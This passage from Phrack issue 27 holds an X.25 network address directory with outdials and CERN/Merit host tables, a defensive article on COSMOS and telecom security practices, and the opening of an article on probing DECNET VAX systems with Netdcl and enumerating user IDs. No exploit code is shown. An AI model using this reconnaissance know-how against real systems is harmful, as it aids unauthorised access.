  0310 600 557 1                   STRATUS/32
  0310 600 560 3                   (Host) systems 1,2,3,4,5,C (5=Outdial)
B 0310 600 562 200      FNAL       Fermilab
B 0310 600 562 226                 Fermilab 2
B 0310 600 578 78                  BIX
B 0310 600 584 401                 Washington Post
B 0310 600 61           DIALOG1    Lockheed Info Systems
  0310 600 61*DSDDIPSSL ORBIT2     SDC Search Service
  0310 600 628 1                   EDCS
  0310 600 628 3                   EDCS
  0310 600 643 2                   EASYLINK
  0310 600 643 4                   EASYLINK
  0310 600 672 2                   International Network
  0310 600 68                      Stanford SUMEX-AIM. Tenex op syst.
  0310 600 683 2                   A&A DATANET (Systems 1,8,0,14)
X 0310 600 701 7                   Outdial NY
  0310 600 759 6                   (Host)  A - VM/370, B - VM/370
? 0310 600 787                     Dallas
  0310 601 79                      Berkley Univ.
  0310 602 88                      Stanford Research Institute
B 0310 611 467                     Cas Online Sys.
  0310 614 67                      Ohio CAS (Chemical Abstracts Service)
  0310 617 001 38                  Multics
  0310 647 911 065                 BIX Lexington Data Service
  0310 690 006 1*D      DIALOG4    Lockheed DIALOG service
B 0310 690 080 3*D      DIALOG3    Lockheed DIALOG service
  0310 690 762 6                   Emery ADO
  0311 0                TELENET    USA - Telenet
B 0311 002 130 0039                ECLD
  0311 020 100 02000               Insco Systems
  0311 020 100 022                 New Jersey Outdial 2400 bps (Area 201)
  0311 020 100 02300               American Information Services
  0311 020 100 02400               The Information Bank
  0311 020 100 02500               New Jersey Institute of Technology
  0311 020 100 02800               Olcott International Company
  0311 020 100 03700               Informatics Inc
  0311 020 100 169      MOUTON
  0311 020 100 301                 New Jersey Outdial 1200 bps (Area 201)
  0311 020 101 59200               Scientific Process & Research Inc
  0311 020 200 02100               Scientific Timesharing
  0311 020 200 02200               Scientific Timesharing
X 0311 020 200 066                 Air Force
T 0311 020 200 099      ICIB       Information Council Incorporated B system
  0311 020 200 1        TELEMAIL   US Telemail facility
X 0311 020 200 10900    CIS        Chemical Information Systems
A 0311 020 200 115                 Outdial 300 bps (Area 202)
A 0311 020 200 116                 Outdial 1200 bps (Area 202)
  0311 020 200 117                 Distr. of Columbia Outdial 2400 bps (Area
                                   202)
B 0311 020 200 141      TELEMAIL   US Telemail facility (GT-Net)
  0311 020 200 14175    TELEENQ    Telenet Enquiry Service
  0311 020 200 14175    TELEMAIL1  US Telemail facility
  0311 020 200 14275    TELENET    US Telenet
  0311 020 201 19500               Gallaude College Computer Centre
  0311 020 300 06400               NCSS Bureau
  0311 020 300 130                 Connecticut Outdial 1200 bps (Area 203)
  0311 020 301 78900               Yale University Computer Centre
  0311 020 400 02900    WATERLO    University of Waterloo
  0311 020 600 019                 Washington Outdial 1200 bps (Area 206)
  0311 021 200 02000               Bowne Timesharing
  0311 021 200 02500               Interactive Market Systems (Anistics)
  0311 021 200 02800               Burroughs Corp (NYC data centre)
  0311 021 200 141      JPLM1      Jet Propulsion Laboratory mail 1, USA
  0311 021 200 142      JPLM2      Jet Propulsion Laboratory mail 2, USA
  0311 021 200 14200               GT-Net Telemail
A 0311 021 200 315                 Outdial 300 bps (Area 212)
A 0311 021 200 316                 Outdial 1200 bps (Area 212)
D 0311 021 200 412                 Outdial 2400 bps (Area 212)
D 0311 021 200 41200               New York City Outdial (Area 212)
  0311 021 201 39200               Memorial Dose Distribution Computation
                                   Service
  0311 021 201 40600               MAV Systems (300 bps)
  0311 021 201 57800               IP Sharp Associates
  0311 021 201 58000               SDL International (1200 bps)
  0311 021 201 58500               SDL International (300 bps)
  0311 021 201 58800               DSL Systems Inc
  0311 021 201 59500               SDL International (1200 bps)
  0311 021 201 62000               Telestat System Inc
  0311 021 201 62700               Telestat Systems Inc
  0311 021 300 02200               Interactive Systems Corporation
  0311 021 300 02700               Mellonics Information Centre
  0311 021 300 029                 TRW Defence & Space Systems Group
B 0311 021 300 03300    ORBIT      Orbit
  0311 021 300 03300*D  ORBIT      SDC Search Service (300 bps)
  0311 021 300 04400               SDC Search Service (1200 bps)
B 0311 021 300 039      USCAL2     Univ. of Southern California
  0311 021 300 04114    IHW        IHW
  0311 021 300 04700               University of Southern California
B 0311 021 300 048      USCAL1     University of Southern California
B 0311 021 300 170                 LRS Dialog 2
T 0311 021 300 17000    DIALOG5    Lockheed Info Systems
  0311 021 300 17000*D  DIALOG2    Lockheed DIALOG service
B 0311 021 300 219      CALTECH    Caltech VAX 11/780
  0311 021 300 21908    CALTECH    Caltech VAX 11/780
  0311 021 300 21909    CALTECH2   Caltech VAX 11/780
  0311 021 300 412                 California Outdial 1200 bps (Area 213)
A 0311 021 300 413                 Outdial CA
  0311 021 300 668                 Adainfo
  0311 021 301 353      UCLA       UCLA, USA
  0311 021 301 40300               Marshall & Swift Publication
  0311 021 400 117                 Outdial 300 bps (Area 214)
A 0311 021 400 118                 Texas Outdial 1200 bps (Area 214)
  0311 021 500 022                 Pennsylvania Outdial 2400 bps (Area 215)
  0311 021 500 112                 Pennsylvania Outdial 1200 bps (Area 215)
A 0311 021 600 020                 Outdial 300 bps (Area 216)
A 0311 021 600 021                 Ohio Outdial 1200 bps (Area 216)
  0311 021 700 021                 University of Illinois - Urbana
  0311 030 100 02000    NLM        National Library of Medicine
A 0311 030 100 02400               The Source
B 0311 030 100 038                 The Source (ID BSC131 SR3811)
B 0311 030 100 243                 ITT Dialcom
  0311 030 100 364                 Primesoft
A 0311 030 100 38                  The Source
B 0311 030 100 633                 Toxnet (NLM)
  0311 030 101 26500               Informatics Inc
  0311 030 300 02000               Computer Sharing Services
  0311 030 300 021                 Colorado Outdial 2400 bps (Area 303)
  0311 030 300 02300               Broker Services Inc
  0311 030 300 115                 Colorado Outdial 1200 bps (Area 303)
  0311 030 301 13100               EDI Computer Services
  0311 030 301 13200               EDI Computer Services
  0311 030 301 13300               Energy Enterprises
  0311 030 500 121                 Florida Outdial 1200 bps (Area 305)
  0311 030 501 16300               Florida Computer Inc
D 0311 030 508 793                 Miami Outdial (Area 305) ?
  0311 031 200 02200               National Computer Network of Chicago
  0311 031 200 024                 Illinois Outdial 2400 bps (Area 217 ?)
  0311 031 200 03100               Continental Bank
  0311 031 200 03200               Continental Bank
  0311 031 200 04900               American Hospital Supply Corporation
  0311 031 200 411                 Illinois Outdial 1200 bps (Area 217 ?)
  0311 031 201 07300               Commodity Information Services
  0311 031 268 801      ADPUSA     ADP Network Services Ltd.
  0311 031 300 024                 Michigan Outdial 2400 bps (Area 313)
  0311 031 300 04000               ADP Network Services
  0311 031 300 06200               Merit International (MIT)
  0311 031 300 216                 Michigan Outdial 1200 bps (Area 313)
  0311 031 301 39800               Merit Computer
  0311 031 400 07200               Environmental DataNetwork Inc.
  0311 031 401 06500               McDonnel Douglas Automation (300 bps)
  0311 031 401 06600               McDonnel Douglas Automation (110 bps)
  0311 031 401 06700               McDonnel Douglas Automation (1200 bps)
  0311 031 401 61000               McDonnel Douglas Automation (300 bps)
  0311 031 500 02000               Bibliographic Retrieval Services
A 0311 040 100 612                 Modemcity
A 0311 040 400 114                 Georgia Outdial 1200 bps (Area 404)
A 0311 040 800 021                 California Outdial 1200 bps? (Area 408)
  0311 040 800 245                 Bridge
B 0311 040 800 246                 SCF
  0311 041 201 4600                On-Line Systems Inc
  0311 041 400 02000               A.O. Smith Data Systems Divisions
  0311 041 400 021                 Wisconsin Outdial 1200 bps (Area 414)
B 0311 041 500 020                 LRS-Dialog 2
A 0311 041 500 02000    DIALOG     Lockheed Information Systems
  0311 041 500 02000*D  DIALOG     Lockheed DIALOG service
B 0311 041 500 048                 LRS Dialog 2
  0311 041 500 04800    DIALOG2    Lockheed Information Systems 2
  0311 041 500 04800*D  DIALOG1    Lockheed DIALOG service
  0311 041 500 117                 California Outdial 1200 bps (Area 415)
I 0311 041 500 210                 Outdial USA
A 0311 041 500 215                 Outdial (Area 415)
A 0311 041 500 217                 Outdial (Area 415)
A 0311 041 500 220                 Outdial 1200 bps (Area 415)
  0311 041 500 48000               Lockheed Information Systems (?)
B 0311 041 500 607                 BIONET
B 0311 041 500 609                 INTELLIGENETICS
  0311 041 501 23600               Hydrocomp Inc (300 bps)
  0311 041 501 23700               Hydrocomp Inc (1200 bps)
  0311 041 501 26800               ITEL Corp (300 bps)
  0311 041 501 26900               ITEL Corp (1200 bps)
  0311 041 501 59700               Stanford Library Centre for Inform
                                   Processing
  0311 041 501 59700               Standard Centre for Information Processing
O 0311 050 006 1                   Nuclear Research
A 0311 050 300 020                 Outdial 300 bps (Area 503)
A 0311 050 300 021                 Oregon Outdial 1200 bps (Area 503)
B 0311 050 500 060                 ICN (=LASL)
B 0311 051 300 03000               Mead Data Central
  0311 051 501 39600               State University of New York
  0311 051 600 02200               Timesharing Resources
D 0311 060 200 020                 Outdial 300 bps (Area 602)
D 0311 060 200 021                 Outdial 1200 bps (Area 602)
B 0311 060 200 150                 Phoenix
  0311 060 201 60900               Timesharing Associates
B 0311 060 300 020                 Dartmouth College
  0311 060 300 02000    DARTMTH    Dartmouth College, USA
  0311 060 300 05000               Corporate Timesharing
  0311 060 301 54700               Raytheon Company Scientific Computer
                                   Service
X 0311 060 700 02000    CORNELL0   Cornell University (134.5 bps)
T 0311 060 700 02100    CORNELL1   Cornell University (300 bps)
T 0311 060 700 02200    CORNELL2   Cornell University (1200 bps)
  0311 060 700 02300    CORNELL3   Cornell University (1200 bps)
  0311 060 700 03600               TIPO Computer
  0311 060 702 00       CORNELL2   Cornell University
  0311 060 702 00       CORNELL2   Cornell University
  0311 060 800 02500               University of Wisconsin
  0311 060 801 6630                University of Wisconsin
  0311 060 900 4200                Dow-Jones
  0311 061 200 02500               Honeywell Inform Services Datanetwork
  0311 061 200 02700               Honeywell Inform Services Datanetwork
  0311 061 200 121                 Minnesota Outdial 1200 bps (Area 612)
  0311 061 201 06500               Honeywell Inform Services Datanetwork,
                                   300 bps
  0311 061 201 06500               Honeywell Inform Services Datanetwork
  0311 061 201 06600               Honeywell Inform Services Datanetwork,
                                   110 bps
  0311 061 201 06700               Honeywell Inform Services Datanetwork,
                                   300 bps
  0311 061 201 06900               Honeywell Inform Services Datanetwork,
                                   134 bps
B 0311 061 400 021                 CAS online
D 0311 061 400 02124    CASUSA     STN International
  0311 061 700 02000               Bolt Beranek & Newman
  0311 061 700 02300               Computer Corporation    of America
  0311 061 700 02400               AVCO Computer Services
  0311 061 700 03600               Data Resources Inc
  0311 061 700 03800               BBN-RCC
  0311 061 700 03800               Bolt Beranek & Newman
  0311 061 700 06700               Management Decision Systems Inc
  0311 061 700 07000               Interactive Science Corp
  0311 061 700 07600               Interactive Science Corp
  0311 061 700 08000               III Systems Inc
B 0311 061 700 08401               LCG
  0311 061 700 12000               Cullinane Corp
  0311 061 700 13700               Masachusetts Institute of Technology
  0311 061 700 13800               Masachusetts Institute of Technology
  0311 061 700 13900               Masachusetts Institute of Technology
  0311 061 700 14000               Masachusetts Institute of Technology
B 0311 061 700 270                 Waltham
B 0311 061 700 609                 Package
B 0311 061 700 613                 BBN10
B 0311 061 700 614                 BBNVAX
  0311 061 701 01600               Data Resources Inc (300 bps)
  0311 061 701 01900               Data Resources Inc (300 bps)
  0311 061 701 16100               First Data Division/ADP Inc
  0311 061 701 16200               First Data Division/ADP Inc
  0311 061 701 25800               Data Resources Inc (134.5 bps)
  0311 061 701 26900               Interactive Management Systems
  0311 061 701 27500               Masachusetts Institute of Technology
  0311 061 701 39000               Masachusetts Institute of Technology
  0311 061 701 40300               Masachusetts Institute of Technology
  0311 061 703 088                 Delphi
  0311 061 900 050                 California Outdial 1200 bps (Area 619)
  0311 070 300 02000               Litton Computer Services
  0311 070 300 02100               American Management Systems
  0311 070 300 056                 PRC Computer Centre Inc
  0311 070 300 117                 Virginia Outdial 2400 bps (Area 703)
B 0311 070 300 50000               NIH-EPA (CIS)
  0311 070 305 05200               Digital Broadcasting Corporation
  0311 071 300 024                 Texas Outdial 2400 bps (Area 713)
  0311 071 300 114                 Texas Outdial 1200 bps (Area 713)
  0311 071 301 08300               Corporate Services Inc
  0311 071 301 56500               Rice University
  0311 071 400 02000    SCIAPP     Science Applications Inc.
  0311 071 401 13700               Engineering Supervision Co
  0311 071 700 02000               Brodart Inc
A 0311 080 100 020                 Outdial 300 bps (Area 801)
A 0311 080 100 021                 Utah Outdial 1200 bps (Area 801)
B 0311 080 100 054                 ES
  0311 080 101 13700               Environmentech Information Systems
  0311 080 400 02000               Multiple Access Computer Group
X 0311 080 800 01046    UKIRTUK    Infra Red Telescope in Hawaii
X 0311 080 800 040      UKIRT      UK Infra Red Telescope in Hawaii
A 0311 081 300 020                 Outdial 300 bps (Area 813)
A 0311 081 300 021                 Florida Outdial 1200 bps (Area 813)
D 0311 081 305 518                 Tampa Outdial (Area 813) ?
  0311 081 800 021                 California Outdial 1200 bps (Area 818)
D 0311 090 900 80000   JPLM3      Jet Propulsion Laboratory mail 2, USA
  0311 090 900 8100                Telemail
  0311 091 400 02200               Electronic Tabulating Corporation
  0311 091 600 050                 California Outdial 1200 bps (Area 916)
A 0311 091 900 020                 Outdial 300 bps (Area 919)
A 0311 091 900 021                 Outdial 1200 bps (Area 919)
  0311 3                RCA        USA - RCA (RCAG)
  0311 9                           USA - TRT
  0312 4                           USA - FTCC
  0312 5                           USA - Uninet
  0312 521 210 1        DIALOG6    Lockheed Info Systems
D 0312 561 703 080                 UNINET
B 0312 561 703 088                 Delphi
  0312 6                AUTONET    USA - Autonet
  0312 688 01           AUTONET    AUTONET Information
  0312 7                           USA - Telenet
  0313 2                COMPU      USA - Compuserve
  0313 6                           USA - Geisco
  0334                             Mexico
  0334 0                           Telepac
  0340                  FA         French Antilles (Martinique (Curacau?))
  0340 0                           Dompac/NTI
  0342                  BDS        Barbados
  0342 235 191 9169
  0350                             Bermuda
  0350 3                           PSDS
  0425                  IL         Israel
  0425 1                           Isranet
B 0425 130 000 215                 Israelbox
  0426                  BRN        Bahrain
  0426 3                           BTC
  0431                  DXB        United Arab Emirates - Dubai
  0440                  J          Japan
  0440 1                           DDX-P
B 0440 129 431 04                  KEK VAX
B 0440 129 431 21                  Tsukuba Uni
  0440 8                VENUSP     Venus-P (Japanese data network)
I 0440 820 023                     KDD ?
B 0440 820 060 01       KDD        KDD Test Host, TOKYO
  0442
B 0442 110 403 25                  OKI
B 0442 433 403 07                  CMES
  0450                             South Korea
  0450 1                           Dacom/DNS
  0454                  HK         Hong Kong
  0454 2                           Intelpak
  0454 5                           Datapak
A 0454 550 010 4        HKDATA     Hong Kong DATAPAK Info
A 0454 550 043 1                   DATAFAX
  0487                             Taiwan
  0487 2                           Pacnet
  0487 7                           Udas
  0505                  AUS        Australia
  0505 2                           Austpac
  0505 228 621 000                 Anglo/Australian Observatory
  0505 228 621 001                 CSIRO Radio-Physics
  0505 228 621 001                 FTP for Epping
  0505 233 422 000      MELBUNI    Melbourne Univ. Australia
A 0505 273 720 000      UQ         Univ. of Queensland Australia
A 0505 273 720 000      UQXA       University of Queensland ANF-10 gateway
D 0505 273 722 0000                Uni Queensland
  0505 282 620 000                 FTP For Austek
A 0505 282 620 000                 VAX in Sidney, Australia
  0505 3                           Midas
  0505 321 000 1                   Network test
  0505 321 000 3                   MIDAS FOX Test
  0510                             Indonesia
  0510 1                           PSDS (1986)
  0525                  SGP        Singapore
  0525 2                           Telepac
A 0525 211 668 8        TELEPAC    Telepac Info
  0530                  NZ         New Zealand
  0530 1                           P.S.S. (Pacnet)
  0530 171 000 004      WAIKATO    Univ of Waikato New Zealand
B 0530 197 000 016                 ASMAIL
  0547                             Fr.Polyn.
  0547 0                           Tompac
  0612                             Ivory Coast
  0612 2                           Sytranpac
  0647                             Reunion
  0647 0                           Dompac/NIT
  0655                  ZA         South Africe
  0655 0                           Saponet
D 0655 011 101 207                 UNI-NET
  0714                             Panama
  0714 1                           Intelpac
  0722                             Argentinia
  0722 2                           Arpac
I 0722 221 110 0171
  0724                  BR         Brazil
  0724 0                           Interdata
  0724 1                           Renpac
D 0724 782 450 8                   Nuclear Research Institute
  0730                             Chile
  0730 0                           Entel
  0732                             Colombia
  0732 0
  0742                             French Guiana
  0742 0                           Dompac/NTI
  0900                             USA ?
  0900 0                           Dialnet

==============================================================================
|
| Local addresses on KOMETH (0228 479 110 86):
|
|   11  KOMETH-Informations
|  120  Modems 1200 bps (predefined numbers, some with a PW)
|  124  Modems 2400 bps (     "        "   ,  "   "    a PW)
|  130  Modems 300 bps  (     "        "   ,  "   "    a PW)
|  1D0  RZ-VAX (EZRZ1)
|  300  ETZ-VAX (CUMULI)
|  520  ETHICS, Library database
|  D11  PSI-Informations
| C000  Time
| C025  X25 Gateway (RZU, with password)
| C011  NUZ-Informations
| C100  RZU, VM/SP, full-screen
|
| There are two information systems on the RZ-VAX:
|
|  MAC-BBS  BBS with Mac-specific informations. Access for validated users
|           only (that means that you have to type in your name, address and
|           whether you're a student at the ETH or not and then wait a few
|           days).
|           (Username=MAC)
|  VisInfo  Informations server of the VIS (Verein der InformatikStudenten)
|           Contains some boards with mail from several networks and from
|           local sources.  Has a CHAT (closed during prime time hours). Free
|           access.
|           (Username=VISINFO)
|
===============================================================================
|
| Local addresses at CERN (0228 468 114 0510):
|
|   17  Lyon (own network)
|   23  PAD
|   31  VXOMEG
|   41  Wisconsin/Madison
|   42  CERNLINE 193
|   45  DECserver
|   51  ALEPH
|   56  MERLIN VAX
|   61  (Prompt )
|   72  Wylbur / VM
|  100  Wylbur / VM
|  101  VM/370 CERNVM
|  102  VM/370 CERNVMB
|  103  VM/370 CERNVM
|  110  VXLDB1 VAX 8650 VMS 4.6
|  111  Information
|  112  VXSB
|  115  VXLDB1
|  120  Service CAD_CAM (VAX 8650+VAX785)/SYSTEME=VMS 4.6
|  121  CAD_CAM
|  122  VXCERN
|  123  VXCERN
|  124  BSD
|  125  CERNVM
|  127  PAD
|  130  L3 test beam VXC3
|  137  ALEPH-TPC
|  140  VXEPEL
|  141  DECserver 200 ("user friendly")
|  142  CERNADD
|  146  VXEPEL
|  147  Uni Genf TEC VAXTEC
|  151  CCVAX / DECserver 200
|  152  Uni Genf WA70
|  154  ALEPH 750 Fastbus VAX
|  161  MCR
|  162  MCR
|  166  VXWA80
|  167  cernvax
|  170  VXINFN
|  175  ALEPH
|  176  MCR with HELP
|  X29  X25 Gateway
|
===============================================================================
|
| Addresses on Merit (0228 468 114 0583):
|
|  The principal host computers on Merit are:
|
|   Name        System/machine       Organization           Location
|   ----        -----------------    -------------------    -------------
|   MSUnet-IBM  VM/CMS IBM 3090-180  Michigan State Univ    East Lansing
|    OU         Multics Honeywell    Oakland Univ           Rochester
|    UB         MTS IBM 3090-400     Univ of Michigan       Ann Arbor
|    UM         MTS IBM 3090-400     Univ of Michigan       Ann Arbor
|    WM         DECsystem-10         Western Michigan Univ  Kalamazoo
|    WU         MTS Amdahl 470V/8    Wayne State Univ       Detroit
|
|  If you have a question about the use of the Merit Network, call
|  (313) 764-9423 and ask for a user consultant.
|
|  Other host computers and services available on the Merit network:
|
|  Autonet             CMU-Cyber           CMU-IBM          Datapac
|  DIALOUT-AA          DIAL1200-AA         DIAL2400-AA      DIAL300-AA
|  EMU-VAX             IGW                 ITI              MAGNET
|  MSU-CLSI            MSU-CLVAX1          MSU-EGRNET       MSU-IBM
|  MSU                 MTU                 MTUS5            OU-SecsNet
|  RPI                 RUAC                Survey           Telenet
|  UM-Annex            UM-CIC              UM-CLINFO        UM-dippy
|  UM-DSC              UM-EnginHarris      UM-MMVAX         UM-Public-Service
|  UM-QuickSlides      UM-RAVAX            UM-zippy         UMD-LIB
|  UMLIB               UMLIB-300           WAYNEST1         WAYNEST2
|  WMU-CAE             WMU-Kanga           WMU-Pooh         WMU-Puff
|  WMU-Tigger          WMU-Winnie          WSU-CSVAX        WSU-ET
|  WSUNET              ZOOnet-KCollege     ZOOnet-KVCC      ZOOnet-Nazareth
|
|  Some of the other computers and services which can be accessed via Telenet,
|  Autonet, and Datapac:
|
|  ABA/NET             ACP                 ADPNS-261        ADPNS-3
|  ADPNS-446           ADPNS-9             Alberta          ARTFL
|  Automail-23         Automail-297        Boeing           British-Columbia
|  BRS                 Cal-Berkeley        Calgary          Caltech-HEP
|  Carnegie-DEC-20     Carnegie-MICOM      Carnegie-11/45   CompuServe
|  Comshare            Cornell             Dalhousie        DatapacInfo
|  Dialcom             Dialog              Dow-Jones        Guelph
|  Guelph-Cosy         Illinois            Illinois-Cyber   LEXIS
|  Manitoba            Maryland-Unix       McGill           MGH
|  Minnesota-Cyber     Minnesota-VAX       MIT-Multics      MIT-VM
|  Montreal            Natl-Lib-Med        NCAR-Telenet     New-Brunswick
|  Newsnet             NJIT-EIES           NLM              NLM-MCS
|  Notre-Dame          NRC                 NYTimes          OAG
|  Queens              Rice                SDC              SFU
|______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 5 of 12


                                    COSMOS

                   COmputer System for Mainframe OperationS

                                   Part Two

                                by King Arthur


     This article will present solutions to the computer security problems
presented in my previous file.  The following are simple but often neglected
items which if properly treated can immensely increase your company's computer
security.  These points apply not merely in regards to COSMOS, but to all
computers in all companies.


A) Dial-Up Security:

     When securing a computer system, regardless of its type, it's important to
remember this: the only way someone can remotely access your system is if there
is a dial-up line leading to that system.  If your system has a dial-up, make
sure that you have taken every possible precaution to secure that line.  "The
one piece of advice I would give is:  Be careful with dial-up lines," says
Bellcore's Ed Pinnes.

     Dave Imparato, Manager of Database Management at New York Telephone, says,
"We have devices that sit in front of our computers that you have to gain
access to.  In order to even get to COSMOS, there are three or four levels of
security you have to go through, and that's before you even get to the system."

Rules for protection of Dial-Up lines:

1.  Have as few dial-up lines as possible.  Private lines or direct connections
    are often a viable replacement for dial-up lines.

2.  If you must have phone lines going to your computer, use external hardware,
    if possible.  For instance, the Datakit Virtual Circuit Switch (VCS) will
    require a user to specify an "access password" and a system destination to
    specify which system you are calling.  The VCS would then connect you to
    the requested system which would prompt you for a login and password.
    Using hardware similar to this serves a double purpose:

         A) It is harder for someone to get into your computer, due to
            additional passwords;

         B) Employees need only dial a single number to access a number of
            systems.

    Another good type of hardware is a callback modem.  A callback modem will
    prompt users for a login and password.  If these are correct, the modem
    will automatically callback to a predetermined number.  At that point you
    would login to the computer.  The advantage of callback is that unless a
    call is placed from a certain phone, there is no way to connect.
    Unfortunately, this is not always efficient for systems with large numbers
    of users.

    Lastly, and the most effective means of access, is to have a system which
    does not identify itself.  A caller has to enter a secret password, which
    doesn't display on the screen.  If a caller doesn't type the correct
    password, the system will hang up, without ever telling the caller what has
    happened.

3.  If you ever detect "hackers" calling a certain number, it is advisable to
    change that number.  Phone numbers should be unlisted.  According to a
    hacker, he once got the number to an AT&T computer by asking directory
    assistance for the number of AT&T at 976 Main Street.

4.  If dial-up lines aren't used on nights or weekends, they should be
    disabled.  Computer hackers usually conduct their "business" on nights or
    weekends.  The COSMOS system has the ability to restrict access by time of
    day.


B) Password Security:

     Using the analogy between a computer and a file cabinet, you can compare a
password to the lock on your file cabinet.  By having accounts with no
passwords you are, in effect, leaving your file cabinet wide open.  A system's
users will often want passwords that are easy to remember.  This is not an
advisable idea, especially for a database system with many users.  The first
passwords tried by hackers are the obvious.  For instance if MF01 is known to
be the user name for the frame room, a hacker might try MF01, FRAME, MDF, or
MAINFRAME as passwords.  If it's known to a hacker that the supervisor at the
MDF is Peter Pinkerton,  PETE or PINKERTON would not be very good passwords.

Rules for password selection:

1.  Passwords should be chosen by system administrators or the like.  Users
    will often choose passwords which provide no security.  They should not be
    within the reach of everybody in the computer room, but instead should be
    sent via company mail to the proper departments.

2.  Passwords should be changed frequently, but on an irregular basis -- every
    four to seven weeks is advisable.  Department supervisors should be
    notified of password changes via mail, a week in advance.  This would
    ensure that all employees are aware of the change at the proper time.  One
    thing you don't want is mass confusion, where everybody is trying to figure
    out why they can't access their computers.

3.  System administrators' passwords should be changed twice as often because
    they can allow access to all system resources.  If possible, system
    administrator accounts should be restricted from logging in on a dial-up
    line.

4.  A password should NEVER be the same as the account name.  Make sure that
    ALL system defaults are changed.

5.  Your best bet is to make passwords a random series of letters and  numbers.
    For example 3CB06W1, Q9IF0L4, or F4W21D0.  All passwords need not be the
    same length or format.  Imparato says, "We built a program in a PC that
    generates different security passwords for different systems and makes sure
    there's no duplication."

6.  It's important to change passwords whenever an employee leaves the company
    or even changes departments.  Imparato says, "When managers leave our
    organization, we make sure we change those passwords which are necessary to
    operate the system."

7.  The Unix operating system has a built-in "password aging" feature, which
    requires a mandatory change of passwords after a period of time.  If you
    run any Unix-based systems, it's important to activate password aging.

8.  When you feel you have experienced a problem, change ALL passwords,  not
    just those passwords involved with the incident.


C) Site security:

     There have been a number of articles written by hackers and published in
2600 Magazine dealing with garbage picking or what hackers call "trashing".
It's important to keep track of what you throw out.  In many companies,
proprietary operations manuals are thrown out.  COSMOS itself is not a
user-friendly system.  In other words, without previous exposure to the system
it would be very difficult to operate.  Bellcore's Beverly Cruse says, "COSMOS
is used in so many places around the country, I wouldn't be surprised if they
found books... in the garbage, especially after divestiture.  One interesting
thing about a COSMOS article written by hackers, is that there was a lot of
obsolete information, so it shows that wherever the information came from... it
was old."

Rules for site security:

1.  Although it may seem evident, employees should be required to show proper
    identification when entering terminal rooms or computer facilities.  It's
    doubtful that a hacker would ever attempt to infiltrate any office, but
    hackers aren't the only people you have to worry about.

2.  Urge employees to memorize login sequences.  It's a bad idea for passwords
    to be scribbled on bits of paper taped to terminals.  Eventually, one of
    those scraps may fall into the wrong hands.

3.  Garbage should be protected as much as possible.  If you use a private
    pick-up, keep garbage in loading docks, basements, or fenced-off areas. If
    you put your garbage out for public sanitation department pick-up, it's a
    good idea to shred sensitive materials.

4.  Before throwing out old manuals or books, see if another department could
    make use of them.  The more employees familiar with the system, the less of
    a chance that there will be a security problem.

5.  Printing terminals should be inspected to make sure that passwords are not
    readable.  If passwords are found to echo, check to see if the duplex is
    correct.  Some operating systems allow you to configure dial-ups for
    printer use.


D) Employee Security:

     When a hacker impersonates an employee, unless he is not successful there
is a great chance the incident will go unreported.  Even if the hacker doesn't
sound like he knows what he's talking about, employees will often excuse the
call as an unintelligent or uninformed person.  It's unpleasant to have to
worry about every call with an unfamiliar voice on the other end of the phone,
but it is necessary.

Rules for employee security:

1.  When making an inter-departmental call, always identify yourself with:
    1) Your name; 2) Your title; and 3) Your department and location.

2.  Be suspicious of callers who sound like children, or those who ask you
    questions that are out of the ordinary.  Whenever someone seems suspicious,
    get their supervisor's name and a callback number.  Don't discuss anything
    sensitive until you can verify their identity.  Don't ever discuss
    passwords over the phone.

3.  When there is a security problem with a system, send notices to all users
    instructing them not to discuss the system over the phone, especially if
    they do not already know the person to whom they are talking.

4.  Remind all dial-up users of systems, before hanging up.

5.  If security-minded posters are put up around the workplace, employees are
    bound to take more care in their work and in conversations on the phone.

6.  If managers distribute this and other computer security articles to
    department supervisors employee security will be increased.


E) General Security:

     Bellcore recently sent a package to all system administrators of COSMOS
systems.  The package detailed security procedures  which applied to COSMOS and
Unix-based systems.  If you are a recipient of this package, you should re-read
it thoroughly to ensure that your systems are secure.  Cruse says, "Last
year... I had a call from someone within an operating company with a COSMOS
security problem.  All we really did was give them documentation which reminded
them of existing security features...  There is built-in security in the COSNIX
operating system...  We really didn't give them anything new at the time.  The
features were already there; we gave them the recommendation that they
implement all of them."

     If you feel you may not be using available security features to the
fullest, contact the vendors of your computer systems and request documentation
on security.  Find out if there are security features that you may not be
currently taking advantage of.  There are also third party software companies
that sell security packages for various operating systems and computers.

     Computer security is a very delicate subject.  Many people try to pretend
that there is no such thing as computer crime.  Since the problem exists, the
best thing to do is to study the problems and figure out the best possible
solutions.  If more people were to write or report about computer security, it
would be easier for everyone else to protect themselves.  I would like to see
Bellcore publish security guidelines, available to the entire
telecommunications industry.  Keep in mind, a chain is only as strong as its
weakest link.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 6 of 12

                 <<<<<<<<<<<<<<<<<<<<<<*>>>>>>>>>>>>>>>>>>>>>>
                 <<<                                       >>>
                 <<<       Looking Around In DECNET        >>>
                 <<<                                       >>>
                 <<<    by Deep Thought of West Germany    >>>
                 <<<                                       >>>
                 <<<             June 1, 1989              >>>
                 <<<                                       >>>
                 <<<<<<<<<<<<<<<<<<<<<<*>>>>>>>>>>>>>>>>>>>>>>


Disclaimer:  I take no responsibility for any use or abuse of the information
             contained in this article, nor for any damage caused by the use of
             methods described.  DECNET, VAX, and VMS are possibly registered
             trademarks of Digital Equipment Corporation.


There comes a time when every somewhat intelligent programmer asks:  Is hacking
difficult?  Now, being in a university network, why don't just give it a try?
Since one is an official student and somewhat authorized to use the computing
facilities, testing the modern means of communication should cause no trouble.

Well, you start searching on those nodes, you have official access for
interesting programs and procedures.  And you find:  Netdcl, just one program
of many, that obviously enables one to run commands on remote nodes without
having an account on these nodes.  A really interesting thing, as nearly
everything is allowed that a normal user can do.

The dear reader may start to think:  Wasn't there always the shouting about VMS
being the MOST SECURE computer system, making it UNPENETRABLE to hackers?  Ok,
cool down, this feature can be disabled and so, you think, if someone has super
secret data on his VAX, he will stop any use or abuse of this feature.

2nd Act -- Somewhere one has heard about some mystery things called system
calls.  Since one always wanted to know about how to react on keystrokes on a
VAX (really being not trivial!) you start reading the manuals more precisely to
find out how to do it in Pascal.

Randomly on browsing thru the pages you discover functions which deliver
information about Userids.  This comes in handy, as a friend engaged in
university politics wants to distribute a leaflet by email to all registered
users.  In fact, it's completely unproblematic to gain a list of all users.  An
example program, although written in Assembler, is even contained in the
manuals.  Enjoy a list of 1000 Userids complete with information about network
access rights.  The Pascal program is contained in Appendix B (later in this
file).

Sorry, passwords are not stored in this list.  Even the Sysop can't access
